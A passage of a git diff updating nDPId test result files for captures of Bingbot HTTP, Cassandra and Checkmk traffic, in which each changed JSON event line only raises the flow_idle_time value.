-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"bot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1645108240339,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":64,"pkt_l4_len":20,"thread_ts_msec":1645108240339,"pkt":"AFBWtlQQQFU5D63CgQAATQgARQAAKBFTQABuBooQKE2nJFkfSNz9AABQtwbJ7Vj1k5hQEPrw2KMAAKqq+vDYow=="} -00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"bot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1645108240233,"flow_last_seen":1645108240339,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1645108240339,"l3_proto":"ip4","src_ip":"40.77.167.36","dst_ip":"89.31.72.220","src_port":64768,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Azure","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"atlanteditorino.it","url":"atlanteditorino.it\/quartieri\/img\/S.Donato_M.Vittoria1930_B.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (compatible; bingbot\/2.0; +http:\/\/www.bing.com\/bingbot.htm)"}} -00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":402,"source":"bot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":402,"flow_first_seen":1645108240233,"flow_last_seen":1645108245896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":407096,"flow_avg_l4_payload_len":1012,"midstream":0,"thread_ts_msec":1645108245896,"l3_proto":"ip4","src_ip":"40.77.167.36","dst_ip":"89.31.72.220","src_port":64768,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Azure","breed":"Acceptable","category":"Cloud"}} +00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"bot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1645108240233,"flow_last_seen":1645108240233,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1645108240233,"l3_proto":"ip4","src_ip":"40.77.167.36","dst_ip":"89.31.72.220","src_port":64768,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"bot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1645108240233,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":66,"pkt_l4_len":28,"thread_ts_msec":1645108240233,"pkt":"AFBWtlQQQFU5D63CgQAATQgARQIAMBFSQABuBooHKE2nJFkfSNz9AABQtwbJ7AAAAABwwvrwl9EAAAIEBaABAQQC"} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"bot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1645108240233,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":66,"pkt_l4_len":28,"thread_ts_msec":1645108240233,"pkt":"AAAMB6wytJaRl+L8gQAATQgARQAAMAAAQAA\/BspbWR9I3ChNpyQAUP0AWPWTl7cGye1wEnIQNMAAAAIEBbQBAQQC"} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"bot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1645108240339,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":64,"pkt_l4_len":20,"thread_ts_msec":1645108240339,"pkt":"AFBWtlQQQFU5D63CgQAATQgARQAAKBFTQABuBooQKE2nJFkfSNz9AABQtwbJ7Vj1k5hQEPrw2KMAAKqq+vDYow=="} +00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"bot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1645108240233,"flow_last_seen":1645108240339,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1645108240339,"l3_proto":"ip4","src_ip":"40.77.167.36","dst_ip":"89.31.72.220","src_port":64768,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Azure","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"atlanteditorino.it","url":"atlanteditorino.it\/quartieri\/img\/S.Donato_M.Vittoria1930_B.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (compatible; bingbot\/2.0; +http:\/\/www.bing.com\/bingbot.htm)"}} +00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":402,"source":"bot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":402,"flow_first_seen":1645108240233,"flow_last_seen":1645108245896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":407096,"flow_avg_l4_payload_len":1012,"midstream":0,"thread_ts_msec":1645108245896,"l3_proto":"ip4","src_ip":"40.77.167.36","dst_ip":"89.31.72.220","src_port":64768,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Azure","breed":"Acceptable","category":"Cloud"}} 00553{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":402,"source":"bot.pcap","alias":"nDPId-test","packets-captured":402,"packets-processed":402,"total-skipped-flows":0,"total-l4-data-len":407096,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1645108245896} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 402/402 diff --git a/test/results/cassandra.pcap.out b/test/results/cassandra.pcap.out index 5ca43793e..c5fe1531d 100644 --- a/test/results/cassandra.pcap.out +++ b/test/results/cassandra.pcap.out @@ -1,17 +1,17 @@ 00460{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"cassandra.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"cassandra.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1450889498032} -00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1450889498032,"flow_last_seen":1450889498032,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1450889498032,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46536,"dst_port":9042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1450889498032,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1450889498032,"pkt":"AAAAAAAAAAAAAAAACABFAAA86nRAAEAGUkV\/AAABfwAAAbXII1K9tHk3AAAAAKACqqr+MAAAAgT\/1wQCCAon7JNDAAAAAAEDAwc="} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1450889498032,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1450889498032,"pkt":"AAAAAAAAAAAAAAAACABFAAA8AABAAEAGPLp\/AAABfwAAASNStcjswQ7evbR5OKASqqr+MAAAAgT\/1wQCCAon7JNDJ+yTQwEDAwc="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1450889498032,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1450889498032,"pkt":"AAAAAAAAAAAAAAAACABFAAA06nVAAEAGUkx\/AAABfwAAAbXII1K9tHk47MEO34AQAVb+KAAAAQEICifsk0Mn7JND"} -00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1450889498032,"flow_last_seen":1450889498032,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":9,"flow_tot_l4_payload_len":9,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1450889498032,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46536,"dst_port":9042,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Cassandra","breed":"Acceptable","category":"Database"}} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1450889498074,"flow_last_seen":1450889498074,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1450889498074,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46537,"dst_port":9042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1450889498074,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1450889498074,"pkt":"AAAAAAAAAAAAAAAACABFAAA81IRAAEAGaDV\/AAABfwAAAbXJI1KmXkfoAAAAAKACqqr+MAAAAgT\/1wQCCAon7JNsAAAAAAEDAwc="} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1450889498074,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1450889498074,"pkt":"AAAAAAAAAAAAAAAACABFAAA8AABAAEAGPLp\/AAABfwAAASNStckXl5aGpl5H6aASqqr+MAAAAgT\/1wQCCAon7JNsJ+yTbAEDAwc="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1450889498074,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1450889498074,"pkt":"AAAAAAAAAAAAAAAACABFAAA01IVAAEAGaDx\/AAABfwAAAbXJI1KmXkfpF5eWh4AQAVb+KAAAAQEICifsk2wn7JNs"} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1450889498074,"flow_last_seen":1450889498074,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":9,"flow_tot_l4_payload_len":9,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1450889498074,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46537,"dst_port":9042,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Cassandra","breed":"Acceptable","category":"Database"}} -00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":286,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":144,"flow_first_seen":1450889498032,"flow_last_seen":1450889698077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":25148,"flow_tot_l4_payload_len":78224,"flow_avg_l4_payload_len":543,"midstream":0,"thread_ts_msec":1450889698077,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46536,"dst_port":9042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Cassandra","breed":"Acceptable","category":"Database"}} -00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":286,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":142,"flow_first_seen":1450889498074,"flow_last_seen":1450889698077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11446,"flow_tot_l4_payload_len":28884,"flow_avg_l4_payload_len":203,"midstream":0,"thread_ts_msec":1450889698077,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46537,"dst_port":9042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Cassandra","breed":"Acceptable","category":"Database"}} +00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1450889498032,"flow_last_seen":1450889498032,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1450889498032,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46536,"dst_port":9042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1450889498032,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1450889498032,"pkt":"AAAAAAAAAAAAAAAACABFAAA86nRAAEAGUkV\/AAABfwAAAbXII1K9tHk3AAAAAKACqqr+MAAAAgT\/1wQCCAon7JNDAAAAAAEDAwc="} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1450889498032,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1450889498032,"pkt":"AAAAAAAAAAAAAAAACABFAAA8AABAAEAGPLp\/AAABfwAAASNStcjswQ7evbR5OKASqqr+MAAAAgT\/1wQCCAon7JNDJ+yTQwEDAwc="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1450889498032,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1450889498032,"pkt":"AAAAAAAAAAAAAAAACABFAAA06nVAAEAGUkx\/AAABfwAAAbXII1K9tHk47MEO34AQAVb+KAAAAQEICifsk0Mn7JND"} +00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1450889498032,"flow_last_seen":1450889498032,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":9,"flow_tot_l4_payload_len":9,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1450889498032,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46536,"dst_port":9042,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Cassandra","breed":"Acceptable","category":"Database"}} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1450889498074,"flow_last_seen":1450889498074,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1450889498074,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46537,"dst_port":9042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1450889498074,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1450889498074,"pkt":"AAAAAAAAAAAAAAAACABFAAA81IRAAEAGaDV\/AAABfwAAAbXJI1KmXkfoAAAAAKACqqr+MAAAAgT\/1wQCCAon7JNsAAAAAAEDAwc="} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1450889498074,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1450889498074,"pkt":"AAAAAAAAAAAAAAAACABFAAA8AABAAEAGPLp\/AAABfwAAASNStckXl5aGpl5H6aASqqr+MAAAAgT\/1wQCCAon7JNsJ+yTbAEDAwc="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1450889498074,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1450889498074,"pkt":"AAAAAAAAAAAAAAAACABFAAA01IVAAEAGaDx\/AAABfwAAAbXJI1KmXkfpF5eWh4AQAVb+KAAAAQEICifsk2wn7JNs"} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1450889498074,"flow_last_seen":1450889498074,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":9,"flow_tot_l4_payload_len":9,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1450889498074,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46537,"dst_port":9042,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Cassandra","breed":"Acceptable","category":"Database"}} +00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":286,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":144,"flow_first_seen":1450889498032,"flow_last_seen":1450889698077,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":25148,"flow_tot_l4_payload_len":78224,"flow_avg_l4_payload_len":543,"midstream":0,"thread_ts_msec":1450889698077,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46536,"dst_port":9042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Cassandra","breed":"Acceptable","category":"Database"}} +00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":286,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":142,"flow_first_seen":1450889498074,"flow_last_seen":1450889698077,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11446,"flow_tot_l4_payload_len":28884,"flow_avg_l4_payload_len":203,"midstream":0,"thread_ts_msec":1450889698077,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46537,"dst_port":9042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Cassandra","breed":"Acceptable","category":"Database"}} 00560{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":286,"source":"cassandra.pcap","alias":"nDPId-test","packets-captured":286,"packets-processed":286,"total-skipped-flows":0,"total-l4-data-len":107108,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1450889698077} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 286/286 diff --git a/test/results/check_mk_new.pcap.out b/test/results/check_mk_new.pcap.out index af8087876..96ec80a61 100644 --- a/test/results/check_mk_new.pcap.out +++ b/test/results/check_mk_new.pcap.out @@ -1,11 +1,11 @@ 00463{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"check_mk_new.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00549{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"check_mk_new.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1512031663734} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"check_mk_new.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1512031663734,"flow_last_seen":1512031663734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1512031663734,"l3_proto":"ip4","src_ip":"192.168.100.22","dst_ip":"192.168.100.50","src_port":58998,"dst_port":6556,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"check_mk_new.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1512031663734,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1512031663734,"pkt":"RjIA9qTs8soKyPpECABFEAA8gwhAAEAGbgrAqGQWwKhkMuZ2GZzVcug3AAAAAKACchA4TQAAAgQFtAQCCAorDGs\/AAAAAAEDAwc="} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"check_mk_new.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1512031663734,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1512031663734,"pkt":"8soKyPpERjIA9qTsCABFAAA8AABAAEAG8SLAqGQywKhkFhmc5nZuqQJN1XLoOKAScSBJyAAAAgQFtAQCCAoWUVydKwxrPwEDAwc="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"check_mk_new.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1512031663734,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1512031663734,"pkt":"RjIA9qTs8soKyPpECABFEAA0gwlAAEAGbhHAqGQWwKhkMuZ2GZzVcug4bqkCToAQAOVJwAAAAQEICisMaz8WUVyd"} -00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"check_mk_new.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1512031663734,"flow_last_seen":1512031663736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1512031663736,"l3_proto":"ip4","src_ip":"192.168.100.22","dst_ip":"192.168.100.50","src_port":58998,"dst_port":6556,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"CHECKMK","breed":"Acceptable","category":"DataTransfer"}} -00700{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":98,"source":"check_mk_new.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":98,"flow_first_seen":1512031663734,"flow_last_seen":1512031663775,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":4096,"flow_tot_l4_payload_len":13758,"flow_avg_l4_payload_len":140,"midstream":0,"thread_ts_msec":1512031663775,"l3_proto":"ip4","src_ip":"192.168.100.22","dst_ip":"192.168.100.50","src_port":58998,"dst_port":6556,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"CHECKMK","breed":"Acceptable","category":"DataTransfer"}} 